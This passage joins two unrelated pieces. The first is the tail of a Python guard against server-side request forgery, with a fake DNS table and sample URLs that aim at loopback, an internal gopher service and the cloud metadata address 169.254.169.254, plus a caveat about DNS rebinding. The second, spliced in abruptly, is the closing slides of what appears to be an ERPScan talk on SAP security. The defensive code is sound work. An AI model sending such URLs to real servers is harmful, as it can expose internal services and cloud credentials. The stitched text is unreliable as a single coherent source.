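        addrs = [ipaddress.ip_address(host)]          # IP literal, no lookup
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:                               # socket.gaierror is an OSError
            return False, "host does not resolve"
    for addr in addrs:
        if not addr.is_global:
            return False, "host resolves to non-global address %s" % addr
    return True, "ok"


# Constructed DNS table so the example and its checks run without network access.
FAKE_DNS = {
    "intranet.example.test": ["10.0.0.5"],
    "www.example.test": ["93.184.216.34"],
}


def fake_resolver(host):
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed: unknown host %s" % host)
    return [ipaddress.ip_address(a) for a in FAKE_DNS[host]]


def check_samples():
    """Run the guard over representative URLs -> {url: ok}."""
    urls = [
        "https://www.example.test/report",
        "http://intranet.example.test/",
        "http://127.0.0.1:50000/",
        "http://169.254.169.254/latest/",
        "gopher://10.0.0.5:3300/",
        "http://user:pw@www.example.test/",
    ]
    return {u: is_safe_outbound_url(u, fake_resolver)[0] for u in urls}


if __name__ == "__main__":
    for url, ok in check_samples().items():
        print("%-40s %s" % (url, "allow" if ok else "refuse"))
```

Two caveats apply in production: the fetch must connect to the address that was validated rather than resolve the name a second time (otherwise a DNS rebinding race reopens the hole), and the guard has to run on the final URL after any redirects, not only on the one the user supplied.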
  • 72. Conclusion
    It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.
    It's all in your hands:
    •  SAP Guides
    •  Regular security assessments
    •  ABAP code review
    •  Monitoring technical security
    •  Segregation of Duties

  • 73. Future work
    Many of the researched issues cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for their cooperation. However, if you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
    •  November 9: POC (Korea, Seoul)
    •  November 20: ZeroNights (Russia, Moscow)
    •  November 29: DeepSEC (Austria, Vienna)

  • 74. Web: www.erpscan.com
    e-mail: info@erpscan.com
    Twitter: @erpscan, @_chipik